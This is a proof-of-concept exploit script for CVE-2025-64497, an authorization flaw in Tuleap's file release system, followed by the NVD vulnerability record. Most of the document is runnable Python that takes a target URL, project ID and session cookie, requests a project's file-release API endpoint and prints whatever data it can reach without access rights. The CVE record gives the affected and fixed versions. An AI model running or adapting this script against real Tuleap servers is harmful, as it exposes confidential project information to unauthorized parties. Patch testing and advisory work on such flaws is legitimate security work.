CVE-2025-64497

# CVE-2025-64497 PoC - Tuleap File Release System Unauthorized Access # This PoC demonstrates accessing file release system info without proper authorization import requests import sys def check_tuleap_version(base_url): """Check Tuleap version""" version_url = f"{base_url}/api/version" try: response = requests.get(version_url, timeout=10) if response.status_code == 200: return response.json() except: return None def exploit_unauthorized_access(base_url, project_id, session_cookie=None): """ Exploit CVE-2025-64497 Access file release system information without authorization """ headers = {} if session_cookie: headers['Cookie'] = session_cookie # Try to access file release system of a project without access rights file_release_url = f"{base_url}/api/projects/{project_id}/file_releases" try: response = requests.get(file_release_url, headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Successfully accessed file release system for project {project_id}") print(f"[+] Response: {data}") return True elif response.status_code == 403: print(f"[-] Access denied (expected after patch)") return False else: print(f"[*] Unexpected response: {response.status_code}") return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-64497-poc.py <target_url> [project_id] [session_cookie]") print("Example: python cve-2025-64497-poc.py https://tuleap.example.com 123") sys.exit(1) base_url = sys.argv[1].rstrip('/') project_id = sys.argv[2] if len(sys.argv) > 2 else '1' session_cookie = sys.argv[3] if len(sys.argv) > 3 else None print(f"[*] Testing CVE-2025-64497 on {base_url}") print(f"[*] Target project ID: {project_id}") # Check version first version_info = check_tuleap_version(base_url) if version_info: print(f"[*] Tuleap version: {version_info}") # Attempt exploitation exploit_unauthorized_access(base_url, project_id, session_cookie) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-64497", "sourceIdentifier": "[email protected]", "published": "2025-12-08T23:15:47.957", "lastModified": "2025-12-10T21:10:18.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tuleap is an Open Source Suite for management of software development and collaboration. Versions below 17.0.99.1762431347 of Tuleap Community Edition and Tuleap Enterprise Edition below 17.0-2, 16.13-7 and 16.12-10 allow attackers to access file release system information in projects they do not have access to. This issue is fixed in version 17.0.99.1762431347 of the Tuleap Community Edition and versions 17.0-2, 16.13-7 and 16.12-10 of Tuleap Enterprise Edition."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "16.12-10", "matchCriteriaId": "286870BF-3315-4B78-AC67-97EB2D5F34ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:*", "versionEndExcluding": "17.0.99.1762431347", "matchCriteriaId": "87001E6B-3376-4485-B782-EA59DB145812"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.13", "versionEndExcluding": "16.13-7", "matchCriteriaId": "CBD9092A-8E4A-43EF-B9B8-D8BDA9D30430"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.0", "versionEndExcluding": "17.0-2", "matchCriteriaId": "F96A9306-179A-48BD-A2D9-CB081E9747B8"}]}]}], "references": [{"url": "https://github.com/Enalean/tuleap/commit/403eb69f4cfafe52254c8f9bdbe66e1fedadc254", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Enalean/tuleap/security/advisories/GHSA-v6vm-6rxf-7p2v", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=403eb69f4cfafe52254c8f9bdbe66e1fedadc254", "source": "[email protected]", "tags": ["Patch", "Broken Link"]}, {"url": "https://tuleap.net/plugins/tracker/?aid=45583", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}